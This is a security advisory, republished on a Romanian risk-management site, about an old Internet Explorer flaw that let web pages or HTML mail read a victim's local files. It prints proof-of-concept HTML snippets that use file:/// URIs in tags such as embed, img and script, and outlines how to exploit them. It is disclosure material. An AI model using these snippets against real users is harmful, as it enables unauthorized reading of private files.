arrowHome arrow Securitate IT arrow Microsoft Internet Explorer Local File Accesses Vulnerability
Main Menu
Home
Harta Site
Cauta in site
Termeni si Conditii
Date Contact
Business Corner
Solutii BUSINESS
Despre Mine si Site
Managementul Riscului
Analize, Cercetari, Studii
Dictionar
Instrumente
Tutoriale
Video Tutoriale
Articole Complete
Locuri de munca
Metodologii
Octave
ITIL
COBIT
Microsoft
PMI PMBOK
Mehari
The Orange Book
FMEA
Prince2
Riskit
Risk IT (ISACA)
Articole domenii conexe
Securitate IT
GIS
Business Intelligence
Digital Economy
Social Media
Stiri
Dezvoltare profesionala
Instruire / Training
Evenimente
De interes academic
eAgora



Risk Management pe LinkedIn

Ultimele Comentarii
RSS
Drepturi de Autor


Licenţa Creative Commons


Designed by:
SiteGround web hosting Joomla Templates
Vizitati-ma pe LinkedIn  Vizitati-ma pe Facebook  Urmariti-ma pe Twitter  RSS
Poate te intereseaza si ...
Microsoft Internet Explorer Local File Accesses Vulnerability E-mail
Overview
Microsoft Internet Explorer is a default browser bundled with all versions of Microsoft Windows operating system.

Description
A vulnerability has been identified in Microsoft Internet Explorer, (default installation) in windows XP service pack 2 which could be exploited by malicious users to obtain victims local files.
This flaw is due to an error in the way Microsoft Internet explorer handles different html tags. Which could be exploited by a malicious remote user to obtain sensitive local files from the victim's computer.


Vulnerability Insight Microsoft Windows explorer is not handling various html tags like "img" "script" , "embed" , "object" , "param" , "style" , "bgsound" , "body", "input" (Other tags may be also vulnerable).
By using the file protocol along with above tags it is possible to accesses victims local files.

a)Embed Tag Local file Accesses
< EMBED src="file:///C:/test.pdf" mce_src="file:///C:/test.pdf" HEIGHT=600 WIDTH=1440 > </EMBED >

b)Object & Param Tag Local File Accesses < object type="audio/x-mid" data="file:///C:/test.mid" width="200" height="20" >
< param name="src" value="file:///C:/test.mid" >
< param name="autoStart" value="true" >
< param name="autoStart" value="0" >
< /object >

c)Body Tag Local File Accesses
< body background="file:///C:/test.gif" onload="alert('loading body bgrd success')" onerror="alert('loading body bgrd error')" >

d)Style Tag Local File Accesses
< STYLE type="text/css" > BODY{background:url("file:///C:/test.gif")}
< /STYLE >

e)Bgsound Tag Local File Accesses
< bgsound src="file:///C:/test.mid" id="soundeffect" loop=1 autostart="true"/ >

f)Input Tag Local File Accesses
< form >
< input type="image" src="file:///C:/test.gif" onload="alert('loading input success')" onerror="alert('loading input error')" >
< /form >

g)Image Tag Local File Accesses
< img src="file:///C:/test.jpg" onload="alert('loading image success')" onerror="alert('loading image error')" >

h)Script Tag Local File Accesses
< script src="file:///C:/test.js" > < /script >

Exploitation method
- Creates a web page or an HTML Mail with the vulnerable code
- When the victim opens the mail or visit the vulnerable site it is possible to accesses his local files

Demonstration
Note: Demonstration will try to accesses few default images and wave files
- Visit the POC
- If vulnerable internet explorer is used it will show your local sample images and give a proper alert

Solution
No solution

Screenshot
Visit:
http://www.xdisclose.com/images/xdiscloselocalie.jpg

Proof Of Concept
Visit:
http://www.xdisclose.com/poc/xdiscloselocalie.html

Impact
A Remote user can get accesses to victims local system files
Scope of impact is limited to system level

Original Advisory Visit:
http://www.xdisclose.com/XD100099.txt

Credits
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

Disclaimer
This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk.
The exploit code is to be used on your testing environment only.
I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Obs. preluare grup [Security_Auditors]





Digg!Reddit!Del.icio.us!Google!Live!Facebook!Slashdot!Netscape!Technorati!StumbleUpon!Newsvine!Furl!Yahoo!Ma.gnolia!Free social bookmarking plugins and extensions for Joomla! websites!
 

Adaugă comentariu

Ne permitem sa selectam mesajele care vor fi publicate.
Va multumim pentru intelegere!


Codul de securitate
Actualizează

< Precedent
Solutii BUSINESS

Consultanţă & Training

Managementul-Riscurilor.ro
Aparitii in presa
Ce este managementul riscului?
Inovatia nu este totul
Risk in an economy under stress
Managementul riscului si dominoul crizei







Parteneri
- DeepSec Blog
- Proceduri ISO
- PM Expert
- eSimi
Statistici Site


Page Rank Check

top of page

http://www.managementul-riscurilor.ro, Powered by Joomla! and designed by SiteGround reseller hosting